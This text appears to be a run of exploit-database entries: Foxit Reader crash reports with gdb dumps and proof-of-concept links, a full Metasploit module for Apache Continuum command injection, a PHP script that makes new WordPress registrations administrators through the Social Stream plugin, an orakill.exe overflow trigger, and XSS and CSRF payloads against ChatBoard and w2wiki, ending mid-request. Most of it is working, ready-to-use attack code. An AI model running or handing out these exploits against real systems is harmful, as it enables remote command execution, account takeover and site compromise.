#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, Q---Type <return> to continue, or q <return> to quit---
Region const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#35 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#37 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#38 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#39 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#40 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#41 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#42 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#43 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#44 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#45 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#46 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#47 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#48 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#49 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
#50 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
#51 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#52 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#53 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
#54 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#55 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#56 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#57 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
(gdb) x/10i $rip
=> 0x8ee95d <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+135>: mov 0x4(%rdx),%rcx
0x8ee961 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+139>: mov %rcx,(%rbx)
0x8ee964 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+142>:
movslq 0x320(%rax),%rcx
0x8ee96b <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+149>: mov 0x4(%rbx),%esi
0x8ee96e <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+152>:
movzbl 0x19(%rdx,%rcx,1),%ecx
0x8ee973 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+157>: shl %cl,%esi
0x8ee975 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+159>:
movslq 0x320(%rax),%rcx
0x8ee97c <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+166>: mov %esi,0x4(%rbx)
0x8ee97f <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+169>:
movzbl 0x3a(%rdx,%rcx,1),%ecx
0x8ee984 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+174>: mov (%rbx),%edx
(gdb) info reg $rdx
rdx 0x90ff9fc23e15101d -7998498756572671971
(gdb) x/10wx $dx
0x101d: Cannot access memory at address 0x101d
(gdb) x/10wx $rdx
0x90ff9fc23e15101d: Cannot access memory at address 0x90ff9fc23e15101d
--- cut ---
Attached is a proof of concept PDF file.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39943.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=742
We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
An example excerpt from the crash log is as follows:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const ()
(gdb) where
#0 0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const ()
#1 0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const ()
#2 0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const ()
#3 0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const ()
#4 0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#5 0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#6 0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) ()
#7 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#8 0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#9 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#10 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#11 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#12 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#13 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#14 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#15 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#16 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#17 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) ()
#18 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x1a1c3b0)
at ../../Readerlite/ReaderLite/src/childframe.cpp:91
#19 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x194ce60)
at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61
#20 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x14c5470, pdoc=0x193a720,
filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99
#21 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x14c5470, csFilterName=...,
wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216
#22 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x14a47e0, csFDFFile=...)
at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941
#23 0x000000000043caac in CMainWindow::OpenFile (this=0x14c4240, fileName=...)
at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434
#24 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:301
(gdb) x/10i $rip
=> 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>:
mov 0x0(%r13,%rbp,8),%rcx
0xaab971 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+99>: test %rcx,%rcx
0xaab974 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+102>:
jne 0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>
0xaab976 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+104>: inc %rbp
0xaab979 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+107>: movzbl 0xe(%rbx),%eax
0xaab97d <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+111>: cmp %ebp,%eax
0xaab97f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+113>:
jg 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>
0xaab981 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+115>:
jmp 0xaab99f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+145>
0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>: mov 0xc(%rsp),%esi
0xaab987 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+121>: mov %r15,%r9
(gdb) info reg
rax 0x7c 124
rbx 0x1a66130 27681072
rcx 0xe1a704fcae02ca58 -2186773610767398312
rdx 0x7fffffffceec 140737488342764
rsi 0x2f 47
rdi 0x1a66130 27681072
rbp 0x0 0x0
rsp 0x7fffffffce90 0x7fffffffce90
r8 0xab0f92 11210642
r9 0x6a83f4ca 1787032778
r10 0xfd 253
r11 0x0 0
r12 0x7fffffffceec 140737488342764
r13 0xe1a704fcae02ca58 -2186773610767398312
r14 0xab0f92 11210642
r15 0x6a83f4ca 1787032778
rip 0xaab96c 0xaab96c <CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const+94>
eflags 0x10202 [ IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
--- cut ---
Attached are three proof of concept PDF files.
There is another crash likely related to this issue:
--- cut ---
Program received signal SIGSEGV, Segmentation fault.
0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) ()
(gdb) where
#0 0x0000000000ab0f94 in _CMapLookupCallback(void*, void*) ()
#1 0x0000000000aab8e4 in CFX_BaseSegmentedArray::IterateSegment(unsigned char const*, int, int (*)(void*, void*), void*) const ()
#2 0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const ()
#3 0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const ()
#4 0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const ()
#5 0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#6 0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
#7 0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) ()
#8 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#9 0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#10 0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
#11 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#12 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#13 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) ()
from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
#14 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#15 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
#16 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) ()
#17 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x196cf90)
at ../../Readerlite/ReaderLite/src/childframe.cpp:91
x#18 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x191dce0)
at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61
#19 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x1468c50, pdoc=0x19194b0,
filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99
/#20 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x1468c50, csFilterName=...,
wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216
#21 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x144a920, csFDFFile=...)
at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941
1#22 0x000000000043caac in CMainWindow::OpenFile (this=0x1468760, fileName=...)
at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434
#23 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe288) at ../../Readerlite/ReaderLite/src/main.cpp:301
(gdb) x/10i $rip
=> 0xab0f94 <_Z19_CMapLookupCallbackPvS_+2>: cmp %edi,(%rsi)
0xab0f96 <_Z19_CMapLookupCallbackPvS_+4>: jne 0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>
0xab0f98 <_Z19_CMapLookupCallbackPvS_+6>: xor %eax,%eax
0xab0f9a <_Z19_CMapLookupCallbackPvS_+8>: cmpb $0xfe,0x4(%rsi)
0xab0f9e <_Z19_CMapLookupCallbackPvS_+12>: setne %al
0xab0fa1 <_Z19_CMapLookupCallbackPvS_+15>: xor $0x1,%eax
0xab0fa4 <_Z19_CMapLookupCallbackPvS_+18>: retq
0xab0fa5 <_CompareDWord>: mov (%rdi),%eax
0xab0fa7 <_CompareDWord+2>: sub (%rsi),%eax
0xab0fa9 <_CompareDWord+4>: retq
(gdb) info reg $rsi
rsi 0x71 113
--- cut ---
Attached are three further files which reproduce the crash (note that MALLOC_CHECK_=3 might be necessary).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39944.zip
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Apache Continuum Arbitrary Command Execution',
'Description' => %q{
This module exploits a command injection in Apache Continuum <= 1.4.2.
By injecting a command into the installation.varValue POST parameter to
/continuum/saveInstallation.action, a shell can be spawned.
},
'Author' => [
'David Shanahan', # Proof of concept
'wvu' # Metasploit module
],
'References' => [
%w{EDB 39886}
],
'DisclosureDate' => 'Apr 6 2016',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X86_64],
'Privileged' => false,
'Targets' => [
['Apache Continuum <= 1.4.2', {}]
],
'DefaultTarget' => 0
))
register_options([
Opt::RPORT(8080)
])
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/continuum/about.action'
)
if res && res.body.include?('1.4.2')
CheckCode::Appears
elsif res && res.code == 200
CheckCode::Detected
else
CheckCode::Safe
end
end
def exploit
print_status('Injecting CmdStager payload...')
execute_cmdstager(flavor: :bourne)
end
def execute_command(cmd, opts = {})
send_request_cgi(
'method' => 'POST',
'uri' => '/continuum/saveInstallation.action',
'vars_post' => {
'installation.name' => Rex::Text.rand_text_alpha(8),
'installation.type' => 'jdk',
'installation.varValue' => '`' + cmd + '`'
}
)
end
end
<?php
/**
* Exploit Title: WordPress Social Stream Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage:
* Software Link: http://codecanyon.net/item/wordpress-social-stream/2201708?s_rank=15
* Version: 1.5.15
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Authenticated wp_options overwrite
* Time line: Found [14-May-2016], Vendor notified [14-May-2016], Vendor fixed: [v1.5.16 19/05/2016 (Current Version)], [RD:1465606136]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'admin_on'){
echo "\nEnabling Admin mode\n";
$data = array('action'=>'dcwss_update', 'option_name'=>'default_role', 'option_value'=>'administrator' );
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ". $resp."\n";
}
if ($options['m'] == 'admin_off'){
echo "\nDisabling Admin mode\n";
$data = array('action'=>'dcwss_update', 'option_name'=>'default_role', 'option_value'=>'subscriber' );
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ". $resp."\n";
}
}
logIn();
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if ( !isset($options['u']) ){
return false;
}
if ( !isset($options['p']) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('admin_on','admin_off') ) ){
return false;
}
if ($options['m'] == 'r' && !isset($options['f'])){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
WordPress Social Stream Expoit Pack
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]
*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
[TARGET_URL] http://localhost/wordpress/
[MODE] admin_on - Sets default role on registration to Administrator
admin_off - Sets default role on registration to Subscriber
Exploit Flow: Call the exploit with -m admin_on, and register a user manually.
After registration call the exploit agiain with -m admin_off .
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m admin_on
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/ORACLE-ORAKILL.EXE-BUFFER-OVERFLOW.txt
[+] ISR: apparitionsec
Vendor:
==============
www.oracle.com
Product:
===================
orakill.exe v11.2.0
The orakill utility is provided with Oracle databases on Windows platforms. The executable (orakill.exe) is available to DBAs to kill Oracle
sessions directly from the DOS command line without requiring any connection to the database.
C:\oraclexe\app\oracle\product\11.2.0\server\bin>orakill.exe -h
Usage: orakill sid thread
where sid = the Oracle instance to target
thread = the thread id of the thread to kill
The thread id should be retrieved from the spid column of a query such as:
select spid, osuser, s.program from
v$process p, v$session s where p.addr=s.paddr
Vulnerability Type:
===================
Buffer Overflow
Reference:
==========
http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Vulnerability Details:
=====================
ToLower() filter being applied to supplied arguments e.g. 'A' \x41 beomes 'a' \x61 etc... may be possible to subvert using encoder
technique like "ALPHA3". Also we need to supply a second argument of just 4 bytes to trigger the access violation.
orakill.exe <104 bytes>, <4 bytes>
Register dump.
EAX 40000000
ECX 0018FCA8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaarrrr"
EDX 00000000
EBX 61616161
ESP 0018FD10 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaarrrr"
EBP 61616161
ESI 61616161
EDI 61616161
EIP 61616161
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
Exploit code(s):
================
'''
import subprocess
pgm="C:\\oraclexe\\app\\oracle\\product\\11.2.0\\server\\bin\\orakill.exe "
payload="A"*100 + "RRRR"
subprocess.Popen([pgm, payload, " BBBB"], shell=False)
'''
Disclosure Timeline:
====================================
Vendor Notification: October 5, 2015
Vendor Fix: April 25, 2016
June 13, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
Low
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
hyp3rlinx
'''
# Exploit Title: Ultrabenosaurus ChatBoard - Stored XSS
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ultrabenosaurus.ninja/
# Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability Point
chat.php is not filtering special character
-> file: ./chat.php
-> param: msg
### Vulnerability Code
POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/vul_test/ChatBoard/__original/?chat
Content-Length: 10
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
Connection: keep-alive
msg=654<img src="z" onerror=zz>asd
<!--
# Exploit Title: Ultrabenosaurus ChatBoard - CSRF(Send Message)
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: http://ultrabenosaurus.ninja/
# Software Link: https://github.com/Ultrabenosaurus/ChatBoard/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability Code
-----------------------------------------------------------------------------------------
POST /vul_test/ChatBoard/__original/chat.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://CSRF_NO_REFERE_CHECK
Content-Length: 8
Cookie: PHPSESSID=3oecem8o5c8975dcufbb0moqn5
Connection: keep-alive
msg=CSRF
### Response
-----------------------------------------------------------------------------------------
HTTP/1.1 200 OK
Date: Tue, 14 Jun 2016 01:52:02 GMT
Server: Apache/2.4.10 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
written
-----------------------------------------------------------------------------------------
### Vulnerability Code
-->
<form name="csrf_poc" action="http://127.0.0.1/vul_test/ChatBoard/__original/chat.php" method="POST">
<input type="hidden" name="msg" value="CSRF">
<input type="submit" value="CSRF Attack">
</form>
<script type="text/javascript">document.forms.csrf_poc.submit();</script>
# Exploit Title: w2wiki - Multiple XSS(Stored/Reflected)
# Date: 2016-06-14
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/panicsteve/w2wiki , http://groups.google.com/group/w2wiki
# Software Link: https://github.com/panicsteve/w2wiki/archive/master.zip
# Tested on: Debian [wheezy]
### Vulnerability 1 : Stored XSS
POST /vul_test/w2wiki/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/vul_test/w2wiki/index.php?action=new
